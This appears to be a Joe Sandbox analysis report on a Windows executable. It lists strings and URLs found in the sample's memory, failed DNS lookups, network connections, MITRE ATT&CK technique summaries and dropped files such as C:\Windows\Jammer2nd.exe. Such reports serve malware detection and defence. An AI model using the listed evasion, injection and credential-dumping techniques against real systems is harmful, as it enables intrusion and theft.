Source: .exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/powershell/powershell-tests)
Source: .exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://groups.google.com/forum/?fromgroups#
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live-int.com/ppsecure/inlineconnect.srf?id=80601
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live-int.com/ppsecure/inlineconnect.srf?id=80603
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live-int.com/ppsecure/inlineconnect.srf?id=80604
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live-int.com/ppsecure/inlinelogin.srf?id=80603
Source: .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live-int.com/ppsecure/inlinelogin.srf?id=80604
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live-int.com/ppsecure/inlinelogin.srf?id=80605
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live-int.com/ppsecure/inlinelogin.srf?id=80606
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live-int.com/ppsecure/inlinelogin.srf?id=80607
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live-int.com/ppsecure/inlinelogin.srf?id=80608
Source: .exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live-int.com/ppsecure/inlinepopauth.srf?id=80605
Source: .exe, 00000000.00000003.433232038.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.514457886.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.433139930.00000000008DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/approvesession.srf
Source: .exe, 00000000.00000003.433232038.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.514457886.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.433139930.00000000008DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/listsessions.srf
Source: .exe, 00000000.00000003.514457886.000000000086C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/manageapprover.srf
Source: .exe, 00000000.00000003.433232038.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.514457886.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.433139930.00000000008DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/manageloginkeys.srf
Source: .exe, 00000000.00000003.433232038.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.514457886.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.433139930.00000000008DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/getappdata.srf
Source: .exe, 00000000.00000003.514457886.000000000086C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/inlineclientauth.srf
Source: .exe, 00000000.00000003.514457886.000000000086C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/inlinedesktop.srf
Source: .exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.351716534.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: .exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.351716534.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: .exe, 00000000.00000003.506524395.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.506829046.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wallet.microsoft-ppe.com
Source: .exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: .exe, 00000000.00000003.559474024.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.351716534.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527414235.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403637094.000000000083A000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.546168419.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527841033.0000000000890000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527841033.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.527618971.000000000087A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/accounts/oauthlogin?issueuberauth=1
Source: .exe, 00000000.00000003.559474024.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.548767791.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.546573673.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.556779529.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000081C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.529091909.000000000095B000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.360769423.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403117582.0000000000816000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403117582.000000000083A000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.368417616.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431539132.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.558540476.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.550675478.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.557389244.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409098810.00000000008DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: .exe, 00000000.00000003.559474024.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.548767791.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.546573673.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.556779529.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000081C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.529091909.000000000095B000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.360769423.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403117582.0000000000816000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403117582.000000000083A000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.368417616.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431539132.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.550675478.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.557389244.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409098810.00000000008DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/dot2.gif
Source: .exe, 00000000.00000003.559474024.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.548767791.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.546573673.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.556779529.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390024993.000000000081C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.529091909.000000000095B000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.360769423.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403117582.0000000000816000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431508037.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409040517.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.403117582.000000000083A000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.368417616.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.431539132.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.390101764.0000000000893000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.558540476.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.550675478.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.557389244.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.409098810.00000000008DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/x2.gif
Source: .exe, 00000000.00000003.403615125.0000000000897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com
Source: .exe, 00000000.00000003.450072898.00000000008B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.remix3d.com
Source: .exe, 00000000.00000003.546960080.0000000000814000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.558540476.0000000000814000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.549795782.0000000000814000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.554113149.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xbox-pay-test.com/
Source: .exe, 00000000.00000003.546960080.0000000000814000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.558540476.0000000000814000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.549795782.0000000000814000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.554113149.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xbox-pay.chinatvpay.com/

Source: unknown	DNS traffic detected: query: contoso.com.br replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: lufka.zx replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: netko.hr replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: example.mx replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bryson.demon.co.uk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: somemail.ro replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: x replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: riekk.pl replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: quatro.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fafa.pk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: oopp.pl replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: abcdef.hr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: au.au-net.ne.jp replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: orice.ro replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: tvrtka.hr replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: contoso.com.pt replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: griepp.pl replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: contoso.mx replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: src.dec.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: xxv.pq replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: x.com.pt replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: aaw.pl replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: bog.msu.ru replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: arb.cz replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: mx2-lw-eu.apache.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mx1-lw-eu.apache.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wewew.pl replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: tek-astore.cz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pirajui.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fanfary.pq replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: worldwideoffices.ro replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ppp.ro replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fajrant.qz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: negdje.hr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ektro.cz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: animo.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: kywx.com.pt replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: abcdefg.cz replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: emaiserver.ro replaycode: Name error (3)

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 23.0.174.123
Source: unknown	TCP traffic detected without corresponding DNS query: 104.77.36.175
Source: unknown	TCP traffic detected without corresponding DNS query: 104.77.36.175
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.152.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.152.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.152.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.152.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.152.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.152.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.152.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.152.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.152.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.152.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.90.156.32

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report .exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\Jammer2nd.exe

C:\Windows\Jammer2nd.exe:Zone.Identifier

C:\Windows\pk_zip1.log

